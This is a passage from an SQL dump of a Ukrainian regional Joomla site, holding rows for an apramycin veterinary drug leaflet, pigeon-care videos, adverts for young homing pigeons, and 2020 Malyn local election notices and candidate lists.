tive_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,3,'','',1,48,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(2464,2882,'Апраміцин 100 г Huvepharma (Болгарія)','apramitsin-100-g-huvepharma-bolgariya','<p><img src=\"https://malehus.in.ua/images/stories/apramicin.jpg\" alt=\"\" class=\"fr-fir fr-dii\"></p><p>Самый современный из  антибиотиков группы аминогликозидов. Широчайший спектр действия, высокая  эффективность и надежность.</p><p>Апраміцин® водорозчинний  порошок (водорозчинний порошок для перорального застосування) листівка-вкладка</p><p>Опис Порошок білого або  кремового кольору.</p><p>Склад 1 г препарату містить  діючу речовину: апраміцину сульфат (в перерахунку на основу) - 500 мг. ДопоміжнI речовини: кремнезем колоїдний  безводний, лактози моногідрат.</p><p>Фармакологічні властивості</p><p>АТС vеt класифікаційний код QJ01 - антибактеріальні ветеринарні препарати для системного застосування.QJ01GB90 - Апраміцин.</p><p>Апраміцин — це аміноглікозидний  антибіотик, що характеризується бактерицидною дією, яка полягає у гальмуванні білкового синтезу бактеріальної клітини. Активно діє на грамнегативні (Bordetella bronchiseptica ,E.coli, Vibrio coli, Klebsiella spp., Pseudomonas aeruginosa, Shidella sonnei, Salmonella spp.,Proteus spp.), деякі грампозитивні мікроорганізми (Staphylococcus aureus,Streptococcus haemolyticus) та мікоплазми (Мусоplasma hyopneumoniae).</p><p>При пероральному введенн1 повIльно всмокту€ться 1 створюе  високI антибактер1альн1 концентрац11\" у травному канаМ. Препарат не  метаболізується і характеризується низькою токсичністю. Виводиться з організму, головним чином, з фекаліями і частково з сечею.</p><p>Застосування</p><p>Телята (вIком до 3 м1сяцIв): лIкування тварин, хворих на колIбактер1оз 1 сальмонельоз, що  спричинен1 мIкроорган1змами, чутливими до апрам1цину.</p><p>Поросята (вIком до 120 дIб): лIкування тварин, хворих на  ентерити, що спричинен1 мIкроорган1змами, чутливими до апрам1цину.</p><p>Ягнята (вIком до 3 м1сяцIв): лIкування тварин, хворих на колIбактер1оз, що спричинений мIкроорган1змами, чутливими до  апрам1цину.</p><p>КролI: лIкування тварин при  захворюваннях травного каналу, що спричинен1 мIкроорган1змами, чутливими до апрам1цину.</p><p>Курчата, кури-бройлери: лIкування птицI, хворо\'I на септицем1ю, що спричинена мIкроорган1змами, чутливими до  апрам1цину.</p><p>Дозування</p><p>Перорально 3 питною водою або  зам1нниками молока у дозах: телята (вIком до 3 мIсяц1в) - 40-80 мг препарату на 1 кг маси тIла (20-40 мг апрам1цину на 1 кг  маси тIла) щодобово протягом 5 д1б;</p><p>поросята (вIком до 120 ДIб) — 500-1000 мг препарату на 1  л питноI\' води, що становить 7,5-12,5 мг д1ючоI\' речовини на 1 кг маси тIла (250-500 мг апрам1цину на 1  л питноI\' води) щодобово протягом 7 д1б;</p><p>ягнята (вIком до 3 м1сяцIв) — 20-40 мг препарату на 1 кг  маси тIла (10-20 мг апрам1цину на 1 кг маси тIла) щодобово протягом 3-5 д1б;</p><p>кролі - 100-200 мг препарату на 1 л питної води, що становить 10-15 мг діючої речовини на 1 кг маси тіла (50-100 мг апрам1цину на 1 л питної води)  щодобово протягом 5-8 діб; або100-200 мг препарату на 1 кг корму, що становить  5-10 мг діючої речовини на 1 кг маси тіла (50-100 мг апраміцину на 1 кг корму) щодобово  протягом 3 тижнів;</p><p><strong>курчата, кури-бройлери - 0,5-1 г препарату на 1 л питної води, що становить 25-50 мг діючої речовини на 1 кг маси тіла  (250-500 мг апраміцину на 1 л питної води) щодобово протягом 7 діб.</strong></p><p>Протипоказання</p><p>Підвищена чутливість до  апраміцину. Не застосовувати курям-несучкам, яйця яких призначені для споживання людьми. Препарат не застосовувати котам.  </p><p>Не застосовувати одночасно 3  бета-лактамними антибіотиками у зв\'язку зі зниженням антибактеріального ефекту. Не  змішувати з іншими лікарськими засобами. Не застосовувати тваринам у період вагітності та лактації.</p><p>Застереження</p><p>Забій тварин на м\'ясо  дозволяють через 28 діб (телята) після останнього застосування препарату.  Споживання м\'яса поросят, ягнят, кролів та курчат дозволяють без обмежень.  Отримане, до зазначеного терміну, м\'ясо утилізують або згодовують  непродуктивним тваринам, залежно від висновку лікаря ветеринарної медицини. Перед застосуванням систему поїння необхідно попередньо очистити  від іржі.</p><p>Форма випуску</p><p>Пластикові банки по 50 г або 100 г, вкриті пластиковими кришками типу «кришка у  кришці» 13 встановленим захисним кільцем. Пакувальний матеріал виготовлений 13  поліетилену низької щільності.</p><p>Зберігання</p><p>Сухе, темне, недоступне для  дітей місце при температурі від 5 °С до 25 °С. , Термін придатності — 2 роки. Готовий розчин 3 препаратом необхідно використати протягом 3 діб,  за умови зберігання його у темному місці при температурі від 2 °С до 8 °С. Для застосування у ветеринарній медицині!</p>','',1,135,'2020-09-03 06:49:59',430,'','2020-09-03 06:49:59',0,0,'0000-00-00 00:00:00','2020-09-03 06:49:59','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,2,'','',1,62,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(2465,2883,'Лікування та профілактика інфекційних захворювань в голубів','likuvannya-ta-profilaktika-infektsijnikh-zakhvoryuvan-v-golubiv','	<p><strong><span style=\"font-size: 14px;\">На мою думку, кращий лікнеп від Геннадія Лозка, особливо для початківців.</span></strong></p><p><br></p><p><span class=\"f-video-editor fr-fvn\" contenteditable=\"false\"><iframe allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen=\"\" frameborder=\"0\" height=\"315\" src=\"https://www.youtube.com/embed/J_S_mrarhRg\" width=\"560\"></iframe></span></p><span class=\"f-video-editor fr-fvn\" contenteditable=\"false\"><iframe width=\"560\" height=\"315\" src=\"https://www.youtube.com/embed/z7Dlh7XgshA\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen=\"\"></iframe></span><span class=\"f-video-editor fr-fvn\" contenteditable=\"false\"><iframe width=\"560\" height=\"315\" src=\"https://www.youtube.com/embed/INf5wk0n29E\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen=\"\"></iframe></span><span class=\"f-video-editor fr-fvn\" contenteditable=\"false\"><iframe width=\"560\" height=\"315\" src=\"https://www.youtube.com/embed/XKXlY7TfYMo\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen=\"\"></iframe></span><span class=\"f-video-editor fr-fvn\" contenteditable=\"false\"><iframe width=\"560\" height=\"315\" src=\"https://www.youtube.com/embed/boYH3iyzRzM\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen=\"\"></iframe></span>','',1,135,'2020-09-03 06:54:45',430,'','2020-09-03 07:03:52',430,0,'0000-00-00 00:00:00','2020-09-03 06:54:45','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',9,1,'','',1,71,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(2466,2886,'Молоді поштові голуби','molodi-poshtovi-golubi','<!--StartFragment--><p style=\"margin: 13px 0px; padding: 0px; color: rgb(41, 43, 39); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial; background-color: rgb(255, 255, 255);\"><span style=\"font-family: Verdana, Geneva;\"><strong>В наявності 20 штук молодих поштових 2020 року. Є можливість передати маршрутками в Київ, Житомир, Бердичів, Вінницю,&nbsp;<!--StartFragment-->Хмільник.Телефонуйте 0508320922, домовимось. Фото голубів можна переглянути за посиланням</strong>:</span>&nbsp;<a href=\"https://malehus.in.ua/index.php/foto/fotohalereia/poshtovi-holuby\">https://malehus.in.ua/index.php/foto/fotohalereia/poshtovi-holubyhttps://malehus.in.ua/index.php/foto/fotohalereia/poshtovi-holuby</a></p><p><img alt=\"\" class=\"fr-dii fr-fin\" src=\"https://malehus.in.ua/images/stories/post_gol.jpg\"><br></p><p><br></p><!--EndFragment--><p><span class=\"f-video-editor fr-fvn\" contenteditable=\"false\"><iframe allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen=\"\" frameborder=\"0\" height=\"315\" src=\"https://www.youtube.com/embed/NfS1pt4-VUo\" width=\"560\"></iframe></span><span class=\"f-video-editor fr-fvn\" contenteditable=\"false\"><iframe allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen=\"\" frameborder=\"0\" height=\"315\" src=\"https://www.youtube.com/embed/I4jMCeSKe8c\" width=\"560\"></iframe></span></p>','',1,126,'2020-09-03 17:33:11',430,'','2020-11-06 15:16:01',430,0,'0000-00-00 00:00:00','2020-09-03 17:33:11','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',15,10,'','',1,1410,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(2467,2887,'Молоді поштові білі','molodi-poshtovi-bili','<!--StartFragment--><p><strong><em><span style=\"font-size: 14px;\">&nbsp;В наявності 4 молодих білих 2020 року. Є можливість передати маршрутками в Київ, Житомир, Бердичів, Вінницю, Хмельник,&nbsp; Овруч. Ціна 120, телефонуйте, домовимось. Фото голубів можна переглянути за посиланням</span></em></strong>:<a href=\"https://malehus.in.ua/index.php/foto/fotohalereia/poshtovi-bili\">https://malehus.in.ua/index.php/foto/fotohalereia/poshtovi-bili</a><img alt=\"\" class=\"fr-fin fr-dib\" src=\"https://malehus.in.ua/images/stories/gpost_20200903_00080.jpg\" width=\"776\"></p><p><span class=\"f-video-editor fr-fvn\" contenteditable=\"false\"><iframe allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen=\"\" frameborder=\"0\" height=\"315\" src=\"https://www.youtube.com/embed/QeTvD3S3oZE\" width=\"560\"></iframe></span></p><!--EndFragment-->','',1,126,'2020-09-03 17:59:38',430,'','2020-09-14 18:07:15',430,0,'0000-00-00 00:00:00','2020-09-03 17:59:38','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',8,9,'','',1,325,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(2468,2889,'Інформація про кількість виборців, які мають право голосу на виборах депутатів міської, сільської, селищної ради, та про виборчу систему, за якою проводяться відповідні місцеві вибори 25 жовтня 2020 року за даними ЦВК','informatsiya-pro-kilkist-vibortsiv-yaki-mayut-pravo-golosu-na-viborakh-deputativ-miskoji-silskoji-selishchnoji-radi-ta-pro-viborchu-sistemu-za-yakoyu-provodyatsya-vidpovidni-mistsevi-vibori-25-zhovtnya-2020-roku-za-danimi-tsvk','	<p><img alt=\"\" class=\"fr-dii fr-fin\" src=\"https://malehus.in.ua/images/stories/korrai.jpg\"></p><p><img src=\"https://malehus.in.ua/images/stories/korrai1.jpg\" alt=\"\" class=\"fr-dii fr-fin\"><br></p>','',1,8,'2020-09-10 12:45:06',430,'','2020-10-19 18:48:26',430,0,'0000-00-00 00:00:00','2020-09-10 12:45:06','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',6,45,'','',1,299,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*','',''),(2469,2890,'В Житомирській області утворено 8 виборчих округів','v-zhitomirskij-oblasti-utvoreno-8-viborchikh-okrugiv','	<p><img alt=\"\" class=\"fr-fin fr-dii\" src=\"https://malehus.in.ua/images/stories/okrug_7.jpg\" width=\"618\"></p><p>В Житомирській області утворено 8 виборчих округів,  відповідну постанову прийняла обласна виборча комісія 5 вересня 2020 року.  Зокрема:</p><p>Округ № 1 – Житомирська ОТГ Богунський  район, орієнтована кількість виборців – 116 418</p><p>Округ №2 – Житомирська ОТГ Корольовський  район, с. Вереси, орієнтована кількість виборців – 92 078</p><p>Округ №3 – Радомишльська міська рада та 7  селищних та 8 сільських ОТГ, орієнтована кількість виборців – 131 204</p><p>Округ №4 – Чуднівська та Коростишівська  міські ради і 5 селищних та 7 сільських ОТГ, орієнтована кількість виборців –  143 444</p><p>Округ №5 – Новоград-Волинська і Баранівська  міські ради та 3 селищні і 7 сільських ОТГ, орієнтована кількість виборців –  130 654</p><p>Округ №6 – Коростенська, Олевська та  Овруцькі міські ради та 2 селищні і 5 сільських ОТГ, орієнтована кількість виборців  – 159 548</p><p>Округ №7 – Малинська міська рада та 2  селищні ОТГ, орієнтована кількість виборців – 42 059</p><p>Округ №8 – Бердичівська та Андрушівська  міські ради та 3 селищні і 5 сільських ОТГ, орієнтована кількість виборців –  131 334</p>','',1,8,'2020-09-10 13:18:22',430,'','2020-10-19 18:48:26',430,0,'0000-00-00 00:00:00','2020-09-10 13:18:22','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',5,44,'','',1,234,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*','',''),(2470,2891,'Виборчі округи по виборах до Малинської міської ради','viborchi-okrugi-po-viborakh-do-malinskoji-miskoji-radi','<p><img src=\"https://malehus.in.ua/images/stories/malyn_okrugi.jpg\" alt=\"\" class=\"fr-fin\" width=\"817\"></p>','',1,8,'2020-09-12 13:47:51',430,'','2020-10-19 18:48:26',430,0,'0000-00-00 00:00:00','2020-09-12 13:47:51','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,43,'','',1,458,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*','',''),(2472,2893,'Незабаром нові реалії Малинщини','nezabarom-novi-realijiji-malinshchini','		<p><img src=\"https://malehus.in.ua/images/stories/0502.jpg\" alt=\"\" class=\"fr-dii fr-fin\"></p>','',1,8,'2020-09-15 13:02:01',430,'','2020-10-19 18:48:26',430,0,'0000-00-00 00:00:00','2020-09-15 13:02:01','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',3,42,'','',1,210,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*','',''),(2473,2894,'Малинський міський краєзнавчий музей: Туристична мандрівка Малином','malinskij-miskij-kraeznavchij-muzej-turistichna-mandrivka-malinom','<p><span class=\"f-video-editor fr-fvn\" contenteditable=\"false\"><iframe allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen=\"\" frameborder=\"0\" height=\"315\" src=\"https://www.youtube.com/embed/AnhNSWqcVV8\" width=\"560\"></iframe></span></p>','',1,8,'2020-09-15 17:51:15',430,'','2020-10-19 18:48:26',430,0,'0000-00-00 00:00:00','2020-09-15 17:51:15','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,41,'','',1,114,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*','',''),(2475,2896,'Зареєстровано 352 кандидати на 34 депутатських мандати у Малинську міську раду Коростенського району Житомирської області','zareestrovano-352-kandidati-na-34-deputskikh-mandati-u-malinsku-misku-radu-korostenskogo-rajonu-zhitomirskoji-oblasti','<p><img src=\"https://malehus.in.ua/images/stories/vybory.jpg\" alt=\"\" class=\"fr-dii fr-fin\"></p>','',1,8,'2020-09-29 17:45:28',430,'','2020-10-19 18:48:26',430,0,'0000-00-00 00:00:00','2020-09-29 17:45:28','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',4,40,'','',1,286,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*','',''),(2476,2897,'Список кандидатів у депутати до Малинської міської ради по округах','spisok-kandidativ-u-deputati-do-malinskoji-miskoji-radi-po-okrugakh','<!--StartFragment--><p><strong><span style=\"color: rgb(85, 57, 130); font-family: Verdana, Geneva;\"><em>&nbsp;&nbsp;&nbsp;&nbsp;<span style=\"font-size: 20px;\">Кандидати в депутати до Малинської міської ради від Малинської міської організації ПАРТІЇ «ЄС»</span></em></span></strong></p><p><strong><span style=\"color: #553982; font-family: Verdana, Geneva;\">ВИБОРЧИЙ ОКРУГ № 1</span></strong></p><p><span style=\"color: rgb(41, 105, 176); font-family: Verdana, Geneva; font-size: 14px;\">  1. Будник Марія Миколаївна </span></p><p><span style=\"color: rgb(41, 105, 176); font-family: Verdana, Geneva; font-size: 14px;\"> 2. Хоменко Віктор Васильович </span></p><p><span style=\"color: rgb(41, 105, 176); font-family: Verdana, Geneva; font-size: 14px;\"> 3. Єнько Валентина Миколаївна </span></p><p><span style=\"color: rgb(41, 105, 176); font-family: Verdana, Geneva; font-size: 14px;\"> 4. Прокопчук Валерій Володимирович </span></p><p><span style=\"color: rgb(41, 105, 176); font-family: Verdana, Geneva; font-size: 14px;\"> 5. Карпенко Світлана Леонідівна </span></p><p><span style=\"color: rgb(41, 105, 176); font-family: Verdana, Geneva; font-size: 14px;\"> 6. Коломійчук Олександра Миколаївна </span></p><p><span style=\"color: rgb(41, 105, 176); font-family: Verdana, Geneva; font-size: 14px;\"> 7. Петренко Павло Петрович </span></p><p><span style=\"color: rgb(41, 105, 176); font-family: Verdana, Geneva; font-size: 14px;\"> 8. Гончар Василь Васильович </span></p><p><span style=\"color: rgb(41, 105, 176); font-family: Verdana, Geneva; font-size: 14px;\"> 9. Федьович Іван Володимирович </span></p><p><span style=\"color: rgb(41, 105, 176); font-family: Verdana, 